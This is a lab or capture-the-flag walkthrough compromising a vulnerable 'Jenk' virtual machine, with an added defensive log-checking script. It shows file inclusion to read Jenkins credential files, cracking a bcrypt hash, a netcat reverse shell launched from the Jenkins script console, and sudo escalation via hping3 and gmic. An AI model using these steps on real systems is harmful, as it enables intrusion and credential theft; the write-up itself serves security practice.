# Lab setup
Download: Jenk
NAT, IP: 192.168.1.159
# Penetration process
# Initial information gathering
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
8080/tcp open  http    Jetty 10.0.13
|_http-server-header: Jetty(10.0.13)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
```
robots.txt hints at a build button, but a directory scan did not find it.
The directory scan on port 80 found a webcams directory. Opening it shows: http://192.168.1.159/webcams/includecam.php?cam=cam
The cam parameter looks like it could be injection or file inclusion.
Try http://192.168.1.159/webcams/includecam.php?cam=/var/lib/jenkins/users/users and look at the response:
```xml
<?xml version='1.1' encoding='UTF-8'?>
<hudson.model.UserIdMapper>
  <version>1</version>
  <idToDirectoryNameMap class="concurrent-hash-map">
    <entry>
      <string>andrew</string>
      <string>andrew_15328478385288074167</string>
    </entry>
  </idToDirectoryNameMap>
</hudson.model.UserIdMapper>
```
A sensitive file was included, so keep including Jenkins files: http://192.168.1.159/webcams/includecam.php?cam=/var/lib/jenkins/users/andrew_15328478385288074167/config
The response contains the password hash: $2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu
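An added defensive example, not part of the original writeup: a small Python checker that parses Apache access-log lines and flags requests where the file-selecting parameter (cam, as on this box) carries an absolute path, directory traversal, a null byte or a URL/stream wrapper instead of a bare camera name. The log lines are constructed, and the combined log format and the parameter name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-log lines (not from the original post) shaped like the requests above.
SAMPLE_LOG = """\
192.168.1.129 - - [28/May/2024:02:20:01 +0000] "GET /webcams/includecam.php?cam=cam HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.1.129 - - [28/May/2024:02:21:14 +0000] "GET /webcams/includecam.php?cam=/var/lib/jenkins/users/users HTTP/1.1" 200 418 "-" "Mozilla/5.0"
192.168.1.129 - - [28/May/2024:02:22:30 +0000] "GET /webcams/includecam.php?cam=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1890 "-" "curl/7.88.1"
192.168.1.50 - - [28/May/2024:02:23:00 +0000] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
INCLUDE_PARAMS = {"cam"}                      # query parameters that select a file to include (assumed)
SAFE_VALUE = re.compile(r"^[A-Za-z0-9_-]+$")  # a legitimate value is a bare camera name

def classify_value(value):
    """Return why `value` looks like a file-inclusion attempt, or None if it looks benign."""
    decoded = unquote(value)  # parse_qs already decoded once; this also catches double encoding
    if decoded.startswith("/"):
        return "absolute path"
    if ".." in decoded:
        return "directory traversal"
    if "\x00" in decoded:
        return "null byte"
    if re.match(r"^[a-z]+://", decoded):
        return "URL or stream wrapper"
    if not SAFE_VALUE.match(decoded):
        return "unexpected characters"
    return None

def find_lfi_attempts(log_text):
    """Return (ip, timestamp, param, value, reason, status) for each suspicious include request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for param in params.keys() & INCLUDE_PARAMS:
            for value in params[param]:
                reason = classify_value(value)
                if reason:
                    hits.append((m["ip"], m["ts"], param, value, reason, int(m["status"])))
    return hits

print(*find_lfi_attempts(SAMPLE_LOG), sep="\n")
```

A 200 status on a flagged request (as in the second sample line) is the case worth alerting on first, since it means the include succeeded.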
```
┌──(root㉿kali)-[~/Desktop]
└─# echo '$2a$10$V.wxGyfowdGEVLvpQt5DROedmKKUp11g922/V.tb1xmi8eYe7rmzu' > hash

┌──(root㉿kali)-[~/Desktop]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
andrew1          (?)
1g 0:00:00:08 DONE (2024-05-28 02:27) 0.1197g/s 99.16p/s 99.16c/s 99.16C/s caitlin..yamaha
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```
Password obtained: andrew1
After logging into the Jenkins backend, open a script console and pop a shell: http://192.168.1.159:8080/computer/(built-in)/script
Run: println "nc -e /bin/sh 192.168.1.129 4444".execute().text
Shell obtained.
# Privilege escalation
sudo -l
hping3 can be run as the andrew user, so grab a shell from it:
```
jenkins@jenk:~$ sudo -u andrew /usr/sbin/hping3
hping3> /bin/sh
```
Once we have andrew's shell, run sudo gmic -exec bash directly.
Root obtained.